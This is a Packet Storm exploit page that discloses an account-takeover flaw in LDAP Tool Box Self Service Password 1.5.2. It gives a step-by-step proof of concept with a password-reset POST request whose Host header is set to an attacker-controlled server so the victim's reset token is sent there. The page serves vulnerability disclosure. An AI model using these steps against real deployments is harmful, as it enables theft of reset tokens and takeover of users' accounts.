exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LDAP Tool Box Self Service Password 1.5.2 Account Takeover

LDAP Tool Box Self Service Password 1.5.2 Account Takeover
Posted Apr 6, 2023
Authored by Tahar Bennacef

LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.

tags | exploit
SHA-256 | cd2eae47bff74cca424d49fe7fec5d29213305d0b719b89b4707051ee0e097d5
Download | Favorite | View

LDAP Tool Box Self Service Password 1.5.2 Account Takeover

Change Mirror Download
# Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover
# Date: 02/17/2023
# Exploit Author: Tahar BENNACEF (aka tar.gz)
# Software Link: https://github.com/ltb-project/self-service-password
# Version: 1.5.2
# Tested on: Ubuntu

Self Service Password is a PHP application that allows users to change
their password in an LDAP directory.
It is very useful to get back an account with waiting an action from an
administration especially in Active Directory environment

The password reset feature is prone to an HTTP Host header vulnerability
allowing an attacker to tamper the password-reset mail sent to his victim
allowing him to potentially steal his victim's valid reset token. The
attacker can then use it to perform account takeover


*Step to reproduce*

1. Request a password reset request targeting your victim and setting in
the request HTTP Host header the value of a server under your control

POST /?action=sendtoken HTTP/1.1
Host: *111.111.111.111*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Origin: https://portal-lab.ngp.infra
Referer: https://portal-lab.ngp.infra/?action=sendtoken
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

login=test.reset


As the vulnerable web application's relying on the Host header of the
password-reset request to craft the password-reset mail. The victim
receive a mail with a tampered link
[image: image.png]

2. Start a webserver and wait for the victim to click on the link

If the victim click on this tampered link, he will sent his password reset
token to the server set in the password-reset request's HTTP Host header
[image: image.png]

3. Use the stolen token to reset victim's account password


Best regards

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close